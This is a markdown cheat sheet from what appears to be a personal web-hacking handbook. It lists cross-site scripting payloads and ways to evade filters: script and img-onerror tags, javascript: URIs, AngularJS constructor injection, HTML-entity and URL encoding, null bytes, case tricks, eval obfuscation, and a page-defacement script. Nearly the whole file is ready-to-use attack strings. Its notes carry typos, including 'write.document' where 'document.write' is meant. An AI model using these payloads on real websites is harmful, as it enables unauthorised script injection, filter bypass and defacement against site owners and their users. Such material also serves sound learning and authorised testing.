handbook/tools/3.Web-Hacking/4.Injection/XSS/Commands.md
2024-08-31 01:07:22 +02:00

159 lines
4.4 KiB
Markdown

## XSS Injection Technique & Evasion
Always try to enter DUM texte (ABC123) in parameters and in search query. Simply search on the page if this is reflected anywhere!
- `Website.com//feedback?returnPath=/ABC123`
- Search Query
Content Security Policy (CSP)
- If you seem able to bypass some filter but cant get any popup, try diffrent event (onmouseover, onload, ...) and also try different variations of the script tag or evasion (javascript:, `<SCipt>`, ...)
```
Content-Security-Policy: default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self';
```
Type
```
<script>alert('xss')</script>
<img src=x onerror=alert('1')>
javascript:alert(%27xss%27)
```
IMG
```Terminal
<img src=x>
<img src=1 onerror=alert(1)>
```
href
```
href="javascript:alert(1)"
```
DOM
```
location.search ---> Search in the URL for a parameter
write.document ---> This will write to the HTML (Adding something depending on the code)
```
- How to exploit: If you have a variable fetching for ID in the URL and then pasting this value to the HTML, you can create a DOM XSS
Other JS Language
```
# AngularJS
<body ng-app="" class="ng-scope"> ---> Interested in the ng-app
{{$on.constructor("alert(1)")()}} ---> Explained Below
```
- AngularJS
- the JavaScript `constructor` function to create a new object with a specified function as its `constructor` attribute. The function being passed to the `constructor` attribute is an `alert` function that displays a message. The code then calls the object using the `()` operator, causing the `alert` function to be executed. PS: We can see the code on the page once it is executed
## Evasion
Encoding
```
urlencode "http://example.com/?param=linux+url+encoder"
<img onerror=&#34alert(1)&#34src=x>
<img onerror=&#39alert(1)&#39src=x>
...
<script>Encoding</script> ---> %3Cscript%3EEncoding%3C%2Fscript%3E
```
- urlencode ---> Tool to encode url (Possible to encode many times)
Basic Modification
```Terminal
#Encoded tabs/newlines/CR
<script&#9>alert(1)</script>
<script&#10>alert(1)</script>
<script&#13>alert(1)</script>
#Capital letters
<ScRipT>alert(1)</sCriPt>
#If angle brackets are encoded
-alert(1)- ---> (-) replace (> or <)
```
Adding Nullbytes
```Terminal
<%00script>alert(1)</script>
<scr%00ipt>alert(1)</script>
```
Attributes and Tags
```Terminal
<input type="text" name="input" value="hello" >
<input type="text" name="input" value=">< script >alert(1)</script>
<randomtag type="text" name="input" value=">< script >alert(1)</script>
<input/type="text" name="input" value=">< script >alert(1)</script>
<input&#9type="text" name="input" value=">< script >alert(1)</script>
<input&#10type="text" name="input" value=">< script >alert(1)</script>
<input&#13type="text" name="input" value=">< script >alert(1)</script>
<input/'type="text" name="input" value=">< script >alert(1)</script>
<iNpUt type="text" name="input" value=">< script >alert(1)</script>
```
Attributes Nullbytes
```Terminal
<%00input type="text" name="input" value="><script>alert(1)</script>
<inp%00ut type="text" name="input" value="><script>alert(1)</script>
<input t%00ype="text" name="input" value="><script>alert(1)</script>
<input type="text" name="input" value="><script>a%00lert(1)</script>
```
Event Handler
```Terminal
<input onsubmit=alert(1)>
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
```
- https://portswigger.net/web-security/cross-site-scripting/cheat-sheet (VERY GOOD)
Delimiters & Backticks and Brakers
```
#() to Backticks
<img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>
#Backticks
<img onerror=`alert(1)`src=x>
#Encoded backtics
<img onerror=&#96alert(1)&#96src=x>
#Double use of delimiters
<<script>alert(1)//<</script>
#Unknown delimiters
«input onsubmit=alert(1)»
```
Oval ()
```Terminal
<script>eval('a\u006cert(1)')</script>
<script>eval('al' + 'ert(1)')</script>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>
```
Word Filter (If some javascript element is filtered)
```Terminal
<scrscriptipt > might become <script>
```
HTML Defacing
```Terminal
<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
```
All Information ---> https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html